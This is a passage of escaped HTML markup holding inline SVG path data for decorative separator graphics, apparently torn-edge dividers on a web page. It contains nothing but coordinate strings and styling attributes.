d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.